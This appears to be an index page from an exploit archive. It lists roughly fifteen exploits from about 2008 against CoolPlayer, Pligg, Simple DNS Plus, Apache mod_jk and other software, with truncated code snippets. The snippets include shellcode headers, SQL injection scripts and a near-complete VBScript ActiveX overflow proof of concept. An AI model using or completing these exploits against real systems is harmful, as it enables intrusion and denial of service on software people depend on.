CoolPlayer m3u File Local Buffer Overflow Exploit
#!/usr/bin/perl # k`sOSe - 07/29/2008 use warnings; use strict; # http://www.metasploit.com # EXITFUNC=seh, CMD=c:WINDOWSsystem32calc.exe # [*] x86/shikata_ga_nai succeeded, final size 169 my $shellcode = "xd9xcaxd9x74x24xf4x5

Pligg
#!/usr/bin/perl -w use LWP::UserAgent; use MIME::Base64; use Digest::MD5 qw(md5_hex); use Getopt::Std; getopts('h:', %args); print "#############################################n"; print "# Pligg <= 9.9 Remo

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
----------------------------------------------------------------------------- NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow url: http://www.nctsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shi

Simple DNS Plus
#!/usr/bin/perl # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit # # usage: sdns-dos.pl <dns server> <dns source port> <num of packets> # Exploit written by Exodus. # http://www.blackhat.org.il use IO

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
Yahoo Messenger 8.1 (latest) Remote DoS Safe for Scripting, Safe for Initialize <html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript>

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
<!-- Document Imaging SDK Buffer Overflow Vulnerability DoS Proof of concept Author: r0ut3r Mail : writ3r [at] gmail.com ----------------------------- -Tested on WinXP Pro SP2 Version: 10.95 Vendor :

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit
#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <string.h> #include <malloc.h> #include <sys/stat.h> #include <f

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
#// Bea Weblogic -- Apache Connector Remote Exploit -1day #// Should stack break latest Windows Server 2003 <address space randomization> #// BIG THANKS TO #// "dong-hun you"(Xpl017Elz) in INetCop - for his paper #// "T

AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
#/usr/bin/perl #| | Author: GoLd_M #--//--> # -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit -- #--//--> Exploit : use strict; use LWP::Simple; print "- - - - - - - - - - - - - - - - - - - - - - - - - -

PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
<html> <body> <object id=target classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object> <script language=vbscript> arg1=String(10000, "A") target.StartURL(arg1) </script> <

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
#!/usr/bin/python """ Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OID

Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
#!/usr/bin/python # # _____ _ _ _____ _____ _____ _____ # / ___| |_| | _ | _ | _ |_ _| # | (___| _ | [_)_/| (_) | (_) | | | # _____|_| |_|_| |_||_____|_____| |_| # C. H. R. O. O. T. SECURITY GROUP #

HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############

DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
#!/usr/bin/perl # k`sOSe - 7/21/2008 # http://secunia.com/advisories/20172 # A sploit for an ancient vuln. Just because I need # to improve my skills on windows exploitation. use warnings; use strict; # CMD="c:window